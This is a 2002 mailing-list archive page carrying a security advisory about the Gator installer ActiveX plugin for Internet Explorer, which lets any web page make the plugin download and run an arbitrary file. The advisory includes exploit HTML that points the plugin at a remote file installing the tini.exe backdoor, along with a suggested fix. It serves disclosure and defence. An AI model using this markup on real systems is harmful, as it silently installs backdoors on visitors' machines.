Gator installer Plugin allows any software to be installed

From: obscure (obscureat_private)
Date: Wed Feb 20 2002 - 14:30:19 PST

Next message: Scott Woodward: "Remote crashes in Yahoo messenger"

Previous message: Support Info: "Security Update: [CSSA-2002-004.0] Linux - Various security problems in ucd-snmp"
Next in thread: Richard M. Smith: "RE: Gator installer Plugin allows any software to be installed"
Reply: Richard M. Smith: "RE: Gator installer Plugin allows any software to be installed"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Advisory Title: Gator installer Plugin allows any software to be installed
Release Date: 21/01/2002

Application: Gator installer plugin for Internet Explorer (GAIN)


Platform: Windows clients with Internet Explorer.

DLL version - 3.0.6.1



Severity: Malicious users can install backdoor software and
gain easy access to the target machine.

Author:
Obscure^
[ obscureat_private ]

Vendor Status:
Not informed.

Web:

http://www.gator.com
http://eyeonsecurity.net/advisories/gatorieplugin.html


Background.

(extracted from
http://gator.com)

Features:
Fills in FORMS without typing!
Remembers PASSWORDS automatically
Protects and encrypts your data on YOUR computer
Gator comes bundled .. etc

The vulnerabity exists in a plugin which installs the actual
software. This plugin is scriptable and an HTML page to specify
the location of the Gator installation. This activeX component
is usually installed from this page:
http://www.gator.com/download/msie.html

Problem.

The issue here is that any HTML page can specify the location

of the Gator installation file. The
installation file is downloaded, then it is checked for the
filename. If the filename is setup.ex_, it is then decompressed
and executed. If the file is not compressed it will still execute
it. Of course using this method, a malicious user can easily create
an HTML page which makes use of the rogue ActiveX component to
point at a trojan file.



Exploit Example.

<xbject
         id="IEGator"
         classid="CLSID:29EEFF42-F3FA-11D5-A9D5-00500413153C"

codebase="http://www.gator.com/download/2500/iegator_3061_gatorsetup.cab"
         align="baseline"
         border="0"
         width="400"
         height="20">
<pxram name="params"
value="fcn=setup&src=eyeonsecurity.net/advisories/gatorexploit/setup.ex_&bgc
olor=F0F1D0&aic=",aicStr,"&">
</xbject>

I set up a small demonstation which installs tini.exe
(which is a trojan listening on port 7777).
If you need any information about tini.exe check out
http://www.ntsecurity.nu/toolbox/tini/.
The exploit example is found at :
http://eyeonsecurity.net/advisories/gatorexploit

Fix.

Simply delete the ActiveX component from
%windir%\Downloaded Program Files .. i think that should fix it.


Disclaimer.

The information within this document may change without notice. Use of
this information constitutes acceptance for use in an AS IS
condition. There are NO warranties with regard to this information.
In no event shall the author be liable for any consequences whatsoever
arising out of or in connection with the use or spread of this
information. Any use of this information lays within the user's
responsibility.


Feedback.

Please send suggestions, updates, and comments to:

Eye on Security
mail : obscureat_private
web : http://www.eyeonsecurity.net

Next message: Scott Woodward: "Remote crashes in Yahoo messenger"
Previous message: Support Info: "Security Update: [CSSA-2002-004.0] Linux - Various security problems in ucd-snmp"
Next in thread: Richard M. Smith: "RE: Gator installer Plugin allows any software to be installed"
Reply: Richard M. Smith: "RE: Gator installer Plugin allows any software to be installed"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Fri Feb 22 2002 - 06:36:14 PST